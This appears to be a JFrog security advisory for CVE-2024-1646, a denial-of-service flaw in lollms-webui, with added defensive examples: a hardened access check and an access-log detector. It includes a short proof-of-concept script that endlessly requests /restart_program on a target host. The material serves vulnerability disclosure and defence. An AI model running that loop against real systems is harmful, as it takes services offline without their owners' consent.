JFrog Security Research

JFSA-2024-001028815 - lollms-webui exposed endpoints DoS

CVE-2024-1646 | CVSS 8.2

JFrog Severity: high

Discovered by Naveh Racovsky of the JFrog Security Research Team

Published 15 Apr, 2024 | Last updated 15 Apr, 2024

Exposed endpoints in lollms-webui lead to denial of service

parisneo/lollms-webui

Affected versions: (,9.2]; fixed in 9.3

Multiple sensitive endpoints are not adequately protected from access by outside actors. The only protection is a check on the configured host parameter, which restricts the endpoints solely when the server is bound to 0.0.0.0:

if lollmsElfServer.config.host == "0.0.0.0":  # only the all-interfaces bind is treated as exposed

However, the application may be run bound to a specific network interface, in which case this check is insufficient: the endpoints remain reachable from that network without any further restriction.
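The following is an added example, not code from lollms-webui or from the advisory, that reproduces the bind-address check described above and contrasts it with a hypothetical hardened check that decides on the caller's address instead. The function names (`bind_address_check`, `client_address_check`, `is_allowed`, `compare`), the endpoint list and the IP addresses are constructed for illustration.

```python
import ipaddress

# Constructed list of endpoints to protect; the advisory names /restart_program.
SENSITIVE_ENDPOINTS = {"/restart_program"}


def bind_address_check(bind_host: str) -> bool:
    """Mirror of the advisory's logic: allow unless the server is bound to
    every interface. A bind to one specific interface (e.g. 192.0.2.10)
    passes, even though the endpoint is reachable from that network."""
    return bind_host != "0.0.0.0"


def client_address_check(client_ip: str) -> bool:
    """Hypothetical hardened check: look at where the request comes from,
    not at how the listener is configured. Only loopback callers may reach
    sensitive endpoints, regardless of the bind address.
    Assumes the app sees the real peer address (no reverse proxy in front)."""
    try:
        return ipaddress.ip_address(client_ip).is_loopback
    except ValueError:
        return False  # missing or malformed peer address: fail closed


def is_allowed(path: str, bind_host: str, client_ip: str, hardened: bool) -> bool:
    """Authorise a request to `path`; non-sensitive endpoints are always allowed."""
    if path.split("?")[0] not in SENSITIVE_ENDPOINTS:
        return True
    if hardened:
        return client_address_check(client_ip)
    return bind_address_check(bind_host)


def compare(bind_host: str, client_ip: str) -> dict:
    """Run both checks for a /restart_program request in the same scenario."""
    return {
        "advisory_check": is_allowed("/restart_program", bind_host, client_ip, hardened=False),
        "hardened_check": is_allowed("/restart_program", bind_host, client_ip, hardened=True),
    }


if __name__ == "__main__":
    # Constructed scenario: server bound to one LAN interface, remote caller.
    print(compare("192.0.2.10", "198.51.100.7"))  # advisory check allows, hardened check denies
    # Same bind, but the caller is local: hardened check allows.
    print(compare("192.0.2.10", "127.0.0.1"))
```

The first scenario is the one the advisory describes: the bind address is not 0.0.0.0, so the original check lets a remote caller through, while the caller-based check denies it. Note also that the original logic blocks even loopback callers once the server is bound to 0.0.0.0, so it is both too permissive on a specific interface and too strict on the wildcard bind.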

# PoC.py
import requests
from time import sleep
IP_ADDRESS = "aaa.bbb.ccc.ddd" #Change this to the address of the chosen interface
PORT = 9600

while True:
    try:
        response = requests.get(f"http://{IP_ADDRESS}:{str(PORT)}/restart_program")
        print(response.json())
    except Exception:
        pass
    sleep(1)

No mitigations are supplied for this issue.
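Since the advisory lists no mitigation, one thing a defender can do in the meantime is watch the web server's access log for the pattern the PoC above produces: the same remote client requesting /restart_program repeatedly within a short window. The following detection is an added example, not part of the advisory; the log lines are constructed in a combined-log-like format, and the function names (`parse_line`, `detect_restart_hammering`) and thresholds are assumptions.

```python
import ipaddress
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample log (not from the advisory): one remote client hammers
# /restart_program, another client uses an unrelated endpoint, and a loopback
# caller restarts once, which is expected local administration.
SAMPLE_LOG = """\
198.51.100.7 - - [15/Apr/2024:10:00:00 +0000] "GET /restart_program HTTP/1.1" 200 -
198.51.100.7 - - [15/Apr/2024:10:00:01 +0000] "GET /restart_program HTTP/1.1" 200 -
198.51.100.7 - - [15/Apr/2024:10:00:02 +0000] "GET /restart_program HTTP/1.1" 200 -
203.0.113.5 - - [15/Apr/2024:10:00:02 +0000] "GET /generate HTTP/1.1" 200 -
127.0.0.1 - - [15/Apr/2024:10:00:03 +0000] "GET /restart_program HTTP/1.1" 200 -
198.51.100.7 - - [15/Apr/2024:10:00:03 +0000] "GET /restart_program HTTP/1.1" 200 -
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)')
SENSITIVE_PATH = "/restart_program"


def parse_line(line: str):
    """Return (client_ip, timestamp, method, path) or None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["method"], m["path"]


def detect_restart_hammering(log_text: str, threshold: int = 3, window_s: int = 10) -> list:
    """Sliding-window count of /restart_program hits per non-loopback client.
    Returns the client IPs that reach `threshold` hits within `window_s` seconds.
    Assumes the log records the real peer address (no reverse proxy in front;
    with one, the forwarded client header would have to be used instead)."""
    hits = defaultdict(deque)
    alerted = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, _, path = rec
        if path.split("?")[0] != SENSITIVE_PATH:
            continue
        try:
            if ipaddress.ip_address(ip).is_loopback:
                continue  # local restarts are expected; only remote callers are suspicious
        except ValueError:
            pass  # unparsable address: still count it rather than drop it
        window = hits[ip]
        window.append(ts)
        while (ts - window[0]).total_seconds() > window_s:
            window.popleft()
        if len(window) >= threshold and ip not in alerted:
            alerted.append(ip)
    return alerted


if __name__ == "__main__":
    print(detect_restart_hammering(SAMPLE_LOG))  # ['198.51.100.7']
```

The threshold and window are deliberately low here because a legitimate deployment restarts the program rarely; tune them to the environment, and treat any remote hit on this endpoint as worth reviewing while the service is running an affected version.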

Advisory
